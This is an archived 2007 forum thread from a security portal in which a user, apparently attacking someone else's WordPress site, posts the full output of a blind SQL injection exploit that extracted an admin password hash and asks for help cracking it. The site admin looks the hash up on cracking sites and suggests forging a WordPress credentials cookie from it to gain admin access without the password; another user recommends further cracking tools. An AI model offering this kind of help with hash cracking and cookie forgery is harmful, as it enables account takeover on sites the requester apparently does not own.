Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 89
Members: 0
Total: 89
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other security holes -> Hi and TAnks
Post new topicReply to topic View previous topic :: View next topic
Hi and TAnks
PostPosted: Sat Jun 09, 2007 2:52 pm Reply with quote
https
Regular user
Regular user
Joined: Jun 09, 2007
Posts: 5




Hi i use a WordPress Expolit and Give me a this code:
c96a154afc8155f9be50ca4e6ee26617
Tanks For Crack
Have God Time
TANKS
View user's profile Send private message
PostPosted: Sat Jun 09, 2007 9:05 pm Reply with quote
https
Regular user
Regular user
Joined: Jun 09, 2007
Posts: 5




any boudy can HELP ME?
i have Q this code Is MD5?
if mD5 PLZ HELP ME.
TANKS FOR ANYTING
View user's profile Send private message
Re: Hi and TAnks
PostPosted: Sat Jun 09, 2007 9:37 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




https wrote:
Hi i use a WordPress Expolit and Give me a this code:
c96a154afc8155f9be50ca4e6ee26617
Tanks For Crack
Have God Time
TANKS


First, let's try to search this hash from Google:

http://www.google.com/search?hl=en&q=c96a154afc8155f9be50ca4e6ee26617&btnG=Google+Search

Code:

milw0rm.com - free md5/lm hash crackingc96a154afc8155f9be50ca4e6ee26617. notfound. 4:15:11. 2007-05-23 12:14:05. md5. 71015df5375dd4076bd5214f0bfd911d. HaLlo. cracked. 1:45:40 ...
exploit.syue.com/cracker/list.php?start=420 - 21k - Supplemental Result - Cached - Similar pages


And from milw0rm:

Code:

md5 c96a154afc8155f9be50ca4e6ee26617 notfound 4:15:11 2007-05-23 12:14:05


So this seems to be unlikely crackable md5 hash.
But there is one more way to use this hash - you can manually craft special credentials cookie for wordpress and it is good chance to get admin privileges WITHOUT even knowing actual admin's password Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jun 09, 2007 10:50 pm Reply with quote
https
Regular user
Regular user
Joined: Jun 09, 2007
Posts: 5




sori i can't Undrestand i use This EXpolit:


Code:
Target: http://XXX/wp-admin/admin-ajax.php sql table prefix: wp_ cookie suffix: 76e5a16dd105e2328e1fe7b9c8befdc4 testing probe delays 9 14 5 13 6 13 mean nondelayed - 6 dsecs mean delayed - 13 dsecs normal delay: 13 deciseconds finding hash now ... char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 1 --> c current value for user_pass: c char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--57--56 got user_pass pos 2 --> 9 current value for user_pass: c9 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 3 --> 6 current value for user_pass: c96 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 4 --> a current value for user_pass: c96a char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 5 --> 1 current value for user_pass: c96a1 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 6 --> 5 current value for user_pass: c96a15 char to find is [0-9] curr: 52--52--48 curr: 50--52--50 curr: 51--52--51 got user_pass pos 7 --> 4 current value for user_pass: c96a154 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 8 --> a current value for user_pass: c96a154a char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--102--101 got user_pass pos 9 --> f current value for user_pass: c96a154af char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 10 --> c current value for user_pass: c96a154afc char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--56--55 got user_pass pos 11 --> 8 current value for user_pass: c96a154afc8 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 12 --> 1 current value for user_pass: c96a154afc81 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 13 --> 5 current value for user_pass: c96a154afc815 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 14 --> 5 current value for user_pass: c96a154afc8155 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--102--101 got user_pass pos 15 --> f current value for user_pass: c96a154afc8155f char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--57--55 curr: 56--57--56 got user_pass pos 16 --> 9 current value for user_pass: c96a154afc8155f9 char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 17 --> b current value for user_pass: c96a154afc8155f9b char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 18 --> e current value for user_pass: c96a154afc8155f9be char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--53--52 got user_pass pos 19 --> 5 current value for user_pass: c96a154afc8155f9be5 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 20 --> 0 current value for user_pass: c96a154afc8155f9be50 char to find is [a-f] curr: 99--99--97 curr: 98--99--98 got user_pass pos 21 --> c current value for user_pass: c96a154afc8155f9be50c char to find is [a-f] curr: 99--99--97 curr: 98--98--97 got user_pass pos 22 --> a current value for user_pass: c96a154afc8155f9be50ca char to find is [0-9] curr: 52--52--48 curr: 50--52--50 curr: 51--52--51 got user_pass pos 23 --> 4 current value for user_pass: c96a154afc8155f9be50ca4 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 24 --> e current value for user_pass: c96a154afc8155f9be50ca4e char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 25 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6 char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 26 --> e current value for user_pass: c96a154afc8155f9be50ca4e6e char to find is [a-f] curr: 99--102--99 curr: 100--102--100 curr: 101--101--100 got user_pass pos 27 --> e current value for user_pass: c96a154afc8155f9be50ca4e6ee char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--50--49 got user_pass pos 28 --> 2 current value for user_pass: c96a154afc8155f9be50ca4e6ee2 char to find is [0-9] curr: 52--57--52 curr: 54--54--52 curr: 53--54--53 got user_pass pos 29 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6ee26 char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--55--54 got user_pass pos 30 --> 6 current value for user_pass: c96a154afc8155f9be50ca4e6ee266 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 31 --> 1 current value for user_pass: c96a154afc8155f9be50ca4e6ee2661 char to find is [0-9] curr: 52--57--52 curr: 54--57--54 curr: 55--55--54 got user_pass pos 32 --> 7 current value for user_pass: c96a154afc8155f9be50ca4e6ee26617 Final result: user_pass=c96a154afc8155f9be50ca4e6ee26617 Work finished Questions and feedback - http://www.waraxe.us/ See ya! :)


And Get ME this Code :c96a154afc8155f9be50ca4e6ee26617
Mayby Not Work!
View user's profile Send private message
PostPosted: Wed Jun 20, 2007 10:15 am Reply with quote
blaxenet
Active user
Active user
Joined: Jun 20, 2007
Posts: 26




https wrote:
And Get ME this Code :c96a154afc8155f9be50ca4e6ee26617


From Plain-Text.info
c96a154afc8155f9be50ca4e6ee26617 // cracking

You can also try some other tools like Passwords Pro or other MD5 lookup sites, if that fails then wait until Plain Text has finished and see what the final result is.

But note that it may take a while before Plain Text is finished...
View user's profile Send private message Send e-mail Yahoo Messenger
Hi and TAnks
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds